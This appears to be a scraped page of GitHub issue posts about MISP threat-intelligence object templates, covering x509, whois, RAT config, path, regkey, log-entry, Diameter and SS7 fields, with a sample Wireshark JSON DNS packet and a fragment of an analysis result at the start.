    "iocs": [],
    "executed_modules": [
      "office_macros"
    ],
    "probable_names": [],
    "extracted_files": [],
    "status": "finished",
    "tags": [
      "office_macros"
    ],
    "groups": [
      "cert",
      "*"
    ],
    "pending_modules": [],
    "analyst": {
      "$oid": "58d4e81b014ed25aaa77fabf"
    },
    "waiting_modules": [],
    "canceled_modules": [],
    "threat_intelligence": {},
    "generated_files": {},
    "_id": {
      "$oid": "58d4f256014ed28a5d50c113"
    },
    "options": {}
  }
}

x509 attribute types are different than normal attribute types

An existing attribute type is x509-fingerprint-sha1, however the x509 misp object defines the misp-attribute as md5, sha1, sha256.

This has 2 downsides:

  1. searching for attibute types like x509-fingerprint-sha1 (PyMISP and webinterface) will not return x509 misp-object attributes
  2. a dump of (any) md5, sha1, sha256 which are everywhere else used for filenames, will als contain hashes related to x509 certificates; which is illogical

The proposal is thus to change the x509 object type to the

  1. already existing x509-fingerprint-sha1
  2. newly created x509-fingerprint-md5, and x509-fingerprint-sha256

What do you think?

RAT config object?

RAT config object? Following the talk from @bambenek, we might need a generic misp-object for the RAT or malware configuration.

The idea is to store the JSON in that object but we might need some metadata. @bambenek do you see the required metadata which would be needed?

Extend whois object + misp attributes

  1. add new misp attribute whois-registrant-org (used by domaintools for example)
  2. add new object relation to whois field registrant-org
  3. rename registant to registrant in whois object

Path object

Path object following a discussion with @sebdraven we would need an object which includes the following:

  • A complete path
  • The split path (for correlation)
  • Objective of the path (malware inner operation, stealing and ...)

incorrect object names "domain|ip" and "ip|port"

Hi all,

IMHO the objects names "domain|ip" and "ip|port" should read "domain-ip" and "ip-port". Otherwise, an exception "UnknownMISPObjectTemplate" could be thrown if:

  • an existing Event which contains at least one of these objects is loaded by PyMISP:
  • load() method in mispevent.py calls "set_all_values" (line 397) calls "from_dict"
  • line 480: tmp_object = MISPObject(obj['name']) whereas obj['name'] results in either "domain|ip" or "ip|port" which are no valid object names leading to the exception

x509 add relation ship

This relation should be used to link x509 certificates between us to create the certification chain. It should be used to link a PE object or url object too.

    {
      "name": "signed-by",
      "description": "This relationship describes an object signed by another object.",
      "format": [
        "misp"
      ]
},

ASN object to add

ASN object including ASN number, description, country code, list of subnet announced (multiple), first_seen, last_seen, import(multiple), export (multiple), mp-import (multiple), mp-export (multiple).

Object: Log Entry

It would be nice to have an dedicated object for "log-Entry" that then can be used to build a timeline

  • Timestampt (UTC)
  • Timestamp description (e.g. in what log have you found it)
  • System (e.g. which system is your log entry covering)
  • Event description / raw log line
  • Notes
  • involved user
  • Added by
  • malicious yes / no

That way you could create a nice timeline during an investigation

Regkey object

in the same way like Path object, #89

we have differents state for the reg keys:

  • use for persistence

  • read for steal informations

  • set the malware configuration like proxy settings

wireshark format object 

{"timestamp" : "1038497564094", "layers" : {"frame": {"frame_frame_encap_type": "1","frame_frame_time": "Nov 28, 2002 16:32:44.094214000 CET","frame_frame_offset_shift": "0.000000000","frame_frame_ti
me_epoch": "1038497564.094214000","frame_frame_time_delta": "0.135987000","frame_frame_time_delta_displayed": "0.135987000","frame_frame_time_relative": "294.809766000","frame_frame_number": "32","fr
ame_frame_len": "220","frame_frame_cap_len": "220","frame_frame_marked": "0","frame_frame_ignored": "0","frame_frame_protocols": "eth:ethertype:ip:udp:dns"},"eth": {"eth_eth_dst": "00:80:5f:25:84:37"
,"eth_dst_eth_dst_resolved": "CompaqCo_25:84:37","eth_dst_eth_addr": "00:80:5f:25:84:37","eth_dst_eth_addr_resolved": "CompaqCo_25:84:37","eth_dst_eth_lg": "0","eth_dst_eth_ig": "0","eth_eth_src": "0
0:01:02:09:88:f9","eth_src_eth_src_resolved": "BbnBoltB_09:88:f9","eth_src_eth_addr": "00:01:02:09:88:f9","eth_src_eth_addr_resolved": "BbnBoltB_09:88:f9","eth_src_eth_lg": "0","eth_src_eth_ig": "0",
"eth_eth_type": "0x00000800"},"ip": {"ip_ip_version": "4","ip_ip_hdr_len": "20","ip_ip_dsfield": "0x00000000","ip_dsfield_ip_dsfield_dscp": "0","ip_dsfield_ip_dsfield_ecn": "0","ip_ip_len": "206","ip
_ip_id": "0x00008903","ip_ip_flags": "0x00000000","ip_flags_ip_flags_rb": "0","ip_flags_ip_flags_df": "0","ip_flags_ip_flags_mf": "0","ip_ip_frag_offset": "0","ip_ip_ttl": "61","ip_ip_proto": "17","i
p_ip_checksum": "0x0000afd5","ip_ip_checksum_status": "2","ip_ip_src": "194.154.192.1","ip_ip_addr": "194.154.192.1","ip_ip_src_host": "194.154.192.1","ip_ip_host": "194.154.192.1","ip_ip_dst": "192.
168.1.2","ip_ip_addr": "192.168.1.2","ip_ip_dst_host": "192.168.1.2","ip_ip_host": "192.168.1.2","ip_text": "Source GeoIP: Luxembourg","text_ip_geoip_src_country": "Luxembourg","text_ip_geoip_country
": "Luxembourg","ip_text": "Destination GeoIP: Unknown"},"udp": {"udp_udp_srcport": "53","udp_udp_dstport": "1025","udp_udp_port": "53","udp_udp_port": "1025","udp_udp_length": "186","udp_udp_checksu
m": "0x0000d8a6","udp_udp_checksum_status": "2","udp_udp_stream": "2"},"dns": {"dns_dns_response_to": "31","dns_dns_time": "0.135987000","dns_dns_id": "0x00004e02","dns_dns_flags": "0x00008580","dns_
flags_dns_flags_response": "1","dns_flags_dns_flags_opcode": "0","dns_flags_dns_flags_authoritative": "1","dns_flags_dns_flags_truncated": "0","dns_flags_dns_flags_recdesired": "1","dns_flags_dns_fla
gs_recavail": "1","dns_flags_dns_flags_z": "0","dns_flags_dns_flags_authenticated": "0","dns_flags_dns_flags_checkdisable": "0","dns_flags_dns_flags_rcode": "0","dns_dns_count_queries": "1","dns_dns_
count_answers": "1","dns_dns_count_auth_rr": "2","dns_dns_count_add_rr": "2","dns_text": "Queries","text_text": "71.60.64.158.in-addr.arpa: type PTR, class IN","text_dns_qry_name": "71.60.64.158.in-a
ddr.arpa","text_dns_qry_name_len": "25","text_dns_count_labels": "6","text_dns_qry_type": "12","text_dns_qry_class": "0x00000001","dns_text": "Answers","text_text": "71.60.64.158.in-addr.arpa: type P
TR, class IN, gilmore.ael.be","text_dns_resp_name": "71.60.64.158.in-addr.arpa","text_dns_resp_type": "12","text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "86400","text_dns_resp_len": "16","
text_dns_ptr_domain_name": "gilmore.ael.be","dns_text": "Authoritative nameservers","text_text": "60.64.158.in-addr.arpa: type NS, class IN, ns arthur.crpht.lu","text_dns_resp_name": "60.64.158.in-ad
dr.arpa","text_dns_resp_type": "2","text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "86400","text_dns_resp_len": "17","text_dns_ns": "arthur.crpht.lu","text_text": "60.64.158.in-addr.arpa: ty
pe NS, class IN, ns dorado.crpht.lu","text_dns_resp_name": "60.64.158.in-addr.arpa","text_dns_resp_type": "2","text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "86400","text_dns_resp_len": "9"
,"text_dns_ns": "dorado.crpht.lu","dns_text": "Additional records","text_text": "arthur.crpht.lu: type A, class IN, addr 158.64.4.8","text_dns_resp_name": "arthur.crpht.lu","text_dns_resp_type": "1",
"text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "58747","text_dns_resp_len": "4","text_dns_a": "158.64.4.8","text_text": "dorado.crpht.lu: type A, class IN, addr 158.64.4.9","text_dns_resp_n
ame": "dorado.crpht.lu","text_dns_resp_type": "1","text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "56032","text_dns_resp_len": "4","text_dns_a": "158.64.4.9"}}}

Split email objects

Split email message and email addresses to keep the relation between addresses and display names

Diameter object generic

Diameter object generic

Session-Id
Origin-Host
Origin-Realm
Destination-Realm
Destination-Host
User-Name (usually IMSI SS7)

MapSmsTP-DCS value set to 0 is considered as empty value

In the object Ss7-attack when I try to add a TP-DCS with value 0, MISP is returning the following error:

Could not save object as at least one attribute has failed validation (MapSmsTP-DCS). {"value":["Value cannot be empty."]}

image
Category selected is "Other" by default for the field.

When I validate the object without the field then try to edit it again to add MapSmsTP-DCS with value 0, no error is displayed but the field addition is silently dropped.

MISP-Modules - Object question

Quick question as i cant find any answer either in documentation or github. Can someone point me to example of code where "object" is used in a misp module (expansion) ?

Whois object - typo

"registar": {
"description": "Registar of the whois entry",
"ui-priority": 0,
"misp-attribute": "whois-registar"
}

Should be whois-registrar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.